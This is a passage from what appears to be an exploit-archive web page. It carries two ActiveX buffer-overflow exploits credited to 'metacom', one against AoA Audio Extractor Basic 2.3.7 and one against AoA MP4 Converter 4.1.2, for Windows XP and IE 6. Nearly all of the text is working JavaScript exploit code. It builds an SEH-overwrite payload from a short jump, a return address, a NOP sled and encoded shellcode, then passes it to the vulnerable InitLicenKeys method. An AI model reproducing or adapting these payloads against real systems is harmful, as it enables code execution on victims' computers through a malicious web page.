plain">"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+</code></div> <div class="line number22 index21 alt1"> <code class="xml plain">"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+</code></div> <div class="line number23 index22 alt2"> <code class="xml plain">"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+</code></div> <div class="line number24 index23 alt1"> <code class="xml plain">"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+</code></div> <div class="line number25 index24 alt2"> <code class="xml plain">"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+</code></div> <div class="line number26 index25 alt1"> <code class="xml plain">"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+</code></div> <div class="line number27 index26 alt2"> <code class="xml plain">"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+</code></div> <div class="line number28 index27 alt1"> <code class="xml plain">"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+</code></div> <div class="line number29 index28 alt2"> <code class="xml plain">"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+</code></div> <div class="line number30 index29 alt1"> <code class="xml plain">"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+</code></div> <div class="line number31 index30 alt2"> <code class="xml plain">"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+</code></div> <div class="line number32 index31 alt1"> <code class="xml plain">"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+</code></div> <div class="line number33 index32 alt2"> <code class="xml plain">"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+</code></div> <div class="line number34 index33 alt1"> <code class="xml plain">"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+</code></div> <div class="line number35 index34 alt2"> <code class="xml plain">"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+</code></div> <div class="line number36 index35 alt1"> <code class="xml plain">"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+</code></div> <div class="line number37 index36 alt2"> <code class="xml plain">"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+</code></div> <div class="line number38 index37 alt1"> <code class="xml plain">"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+</code></div> <div class="line number39 index38 alt2"> <code class="xml plain">"\x4e\x46\x43\x36\x42\x50\x5a");</code></div> <div class="line number40 index39 alt1"> <code class="xml color1">buffer1</code><code class="xml plain">=</code><code class="xml string">"\x41"</code><code class="xml plain">;</code></div> <div class="line number41 index40 alt2"> <code class="xml color1">buffer2</code><code class="xml plain">=</code><code class="xml string">"\x42"</code><code class="xml plain">;</code></div> <div class="line number42 index41 alt1"> <code class="xml plain">while (buffer1.length<2048){ buffer1+=buffer1;}</code></div> <div class="line number43 index42 alt2"> <code class="xml color1">buffer1</code><code class="xml plain">=buffer1.substring(0,2048);</code></div> <div class="line number44 index43 alt1"> <code class="xml color1">buffer2</code><code class="xml plain">=</code><code class="xml string">buffer1</code><code class="xml plain">;</code></div> <div class="line number45 index44 alt2"> <code class="xml plain">while (buffer2.length<2048){ buffer2+=buffer2;}</code></div> <div class="line number46 index45 alt1"> <code class="xml color1">arg1</code><code class="xml plain">=</code><code class="xml string">buffer1</code><code class="xml plain">+nse+seh+nops+shellcode+buffer2;</code></div> <div class="line number47 index46 alt2"> <code class="xml color1">arg2</code><code class="xml plain">=</code><code class="xml string">"\x52\x53\x54"</code><code class="xml plain">;</code></div> <div class="line number48 index47 alt1"> <code class="xml color1">arg3</code><code class="xml plain">=</code><code class="xml string">"\x52\x53\x54"</code><code class="xml plain">;</code></div> <div class="line number49 index48 alt2"> <code class="xml color1">arg4</code><code class="xml plain">=</code><code class="xml string">"\x52\x53\x54"</code><code class="xml plain">;</code></div> <div class="line number50 index49 alt1"> <code class="xml color1">arg5</code><code class="xml plain">=</code><code class="xml string">"\x52\x53\x54"</code><code class="xml plain">;</code></div> <div class="line number51 index50 alt2"> <code class="xml plain">target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</code></div> <div class="line number52 index51 alt1"> <code class="xml spaces"> </code> </div> <div class="line number53 index52 alt2"> </div> <div class="line number54 index53 alt1"> <code class="xml plain"></script></code></div> <div class="line number55 index54 alt2"> <code class="xml plain"></</code><code class="xml keyword">html</code><code class="xml plain">></code></div> </div>

AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit

<!-- # Exploit Title: AoA Audio Extractor Basic ActiveX # Date: 19.05.2014 # Author: metacom # Website: www.rstforums.com # S...

Read more »

AoA MP4 Converter 4.1.2 - ActiveX Exploit

<div class="container"> <div class="line number1 index0 alt2"> <code class="xml comments"><!--</code></div> <div class="line number2 index1 alt1"> <code class="xml comments"># Exploit Title: AoA MP4 Converter ActiveX</code></div> <div class="line number3 index2 alt2"> <code class="xml comments"># Date: 19.05.2014</code></div> <div class="line number4 index3 alt1"> <code class="xml comments"># Author:metacom </code></div> <div class="line number5 index4 alt2"> <code class="xml comments"># Website: www.rstforums.com</code></div> <div class="line number6 index5 alt1"> <code class="xml comments"># Software Link: www.aoamedia.com/AoAMP4Converter.exe</code></div> <div class="line number7 index6 alt2"> <code class="xml comments"># Version: 4.1.2</code></div> <div class="line number8 index7 alt1"> <code class="xml comments"># Tested on: Windows xp sp3EN  IE 6.0</code></div> <div class="line number9 index8 alt2"> <code class="xml comments">--></code></div> <div class="line number10 index9 alt1"> <code class="xml plain"><</code><code class="xml keyword">html</code><code class="xml plain">></code></div> <div class="line number11 index10 alt2"> <code class="xml plain"><</code><code class="xml keyword">object</code> <code class="xml color1">classid</code><code class="xml plain">=</code><code class="xml string">'clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5'</code> <code class="xml color1">id</code><code class="xml plain">=</code><code class="xml string">'target'</code> <code class="xml plain">/></</code><code class="xml keyword">object</code><code class="xml plain">></code></div> <div class="line number12 index11 alt1"> <code class="xml plain"><</code><code class="xml keyword">script</code> <code class="xml color1">language</code><code class="xml plain">=</code><code class="xml string">'javascript'</code><code class="xml plain">></code></div> <div class="line number13 index12 alt2"> <code class="xml plain">nse="\xEB\x06\x90\x90";</code></div> <div class="line number14 index13 alt1"> <code class="xml plain">seh="\x70\x6b\x04\x10";</code></div> <div class="line number15 index14 alt2"> <code class="xml plain">nops="\x90";</code></div> <div class="line number16 index15 alt1"> <code class="xml plain">while (nops.length<</code><code class="xml keyword">10</code><code class="xml plain">){ nops+="\x90";}</code></div> <div class="line number17 index16 alt2"> <code class="xml plain">shellcode =(</code></div> <div class="line number18 index17 alt1"> <code class="xml plain">"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+</code></div> <div class="line number19 index18 alt2"> <code class="xml plain">"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+</code></div> <div class="line number20 index19 alt1"> <code class="xml plain">"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+</code></div> <div class="line number21 index20 alt2"> <code class="xml plain">"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+</code></div> <div class="line number22 index21 alt1"> <code class="xml plain">"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+</code></div> <div class="line number23 index22 alt2"> <code class="xml plain">"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+</code></div> <div class="line number24 index23 alt1"> <code class="xml plain">"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+</code></div> <div class="line number25 index24 alt2"> <code class="xml plain">"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+</code></div> <div class="line number26 index25 alt1"> <code class="xml plain">"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+</code></div> <div class="line number27 index26 alt2"> <code class="xml plain">"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+</code></div> <div class="line number28 index27 alt1"> <code class="xml plain">"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+</code></div> <div class="line number29 index28 alt2"> <code class="xml plain">"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+</code></div> <div class="line number30 index29 alt1"> <code class="xml plain">"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+</code></div> <div class="line number31 index30 alt2"> <code class="xml plain">"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+</code></div> <div class="line number32 index31 alt1"> <code class="xml plain">"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+</code></div> <div class="line number33 index32 alt2"> <code class="xml plain">"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+</code></div> <div class="line number34 index33 alt1"> <code class="xml plain">"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+</code></div> <div class="line number35 index34 alt2"> <code class="xml plain">"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+</code></div> <div class="line number36 index35 alt1"> <code class="xml plain">"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+</code></div> <div class="line number37 index36 alt2"> <code class="xml plain">"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+</code></div> <div class="line number38 index37 alt1"> <code class="xml plain">"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+</code></div> <div class="line number39 index38 alt2"> <code class="xml plain">"\x4e\x46\x43\x36\x42\x50\x5a");</code></div> <div class="line number40 index39 alt1"> <code class="xml color1">junk1</code><code class="xml plain">=</code><code class="xml string">"\x41"</code><code class="xml plain">;</code></div> <div class="line number41 index40 alt2"> <code class="xml color1">junk2</code><code class="xml plain">=</code><code class="xml string">"\x42"</code><code class="xml plain">;</code></div> <div class="line number42 index41 alt1"> <code class="xml plain">while (junk1.length<2048){ junk1+=junk1;}</code></div> <div class="line number43 index42 alt2"> <code class="xml color1">junk1</code><code class="xml plain">=junk1.substring(0,2048);</code></div> <div class="line number44 index43 alt1"> <code class="xml color1">junk2</code><code class="xml plain">=</code><code class="xml string">junk1</code><code class="xml plain">;</code></div> <div class="line number45 index44 alt2"> <code class="xml plain">while (junk2.length<4048){ junk2+=junk2;}</code></div> <div class="line number46 index45 alt1"> <code class="xml color1">arg1</code><code class="xml plain">=</code><code class="xml string">junk1</code><code class="xml plain">+nse+seh+nops+shellcode+junk2;</code></div> <div class="line number47 index46 alt2"> <code class="xml color1">arg2</code><code class="xml plain">=</code><code class="xml string">"RST"</code><code class="xml plain">;</code></div> <div class="line number48 index47 alt1"> <code class="xml color1">arg3</code><code class="xml plain">=</code><code class="xml string">"RST"</code><code class="xml plain">;</code></div> <div class="line number49 index48 alt2"> <code class="xml color1">arg4</code><code class="xml plain">=</code><code class="xml string">"RST"</code><code class="xml plain">;</code></div> <div class="line number50 index49 alt1"> <code class="xml color1">arg5</code><code class="xml plain">=</code><code class="xml string">"RST"</code><code class="xml plain">;</code></div> <div class="line number51 index50 alt2"> <code class="xml plain">target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</code></div> <div class="line number52 index51 alt1"> <code class="xml spaces"> </code> </div> <div class="line number53 index52 alt2"> <code class="xml spaces"> </code> </div> <div class="line number54 index53 alt1"> <code class="xml plain"></script></code></div> </div>

AoA MP4 Converter 4.1.2 - ActiveX Exploit

<!-- # Exploit Title: AoA MP4 Converter ActiveX # Date: 19.05.2014 # Author:metacom # Website: www.rstforums.com # Software L...

Read more »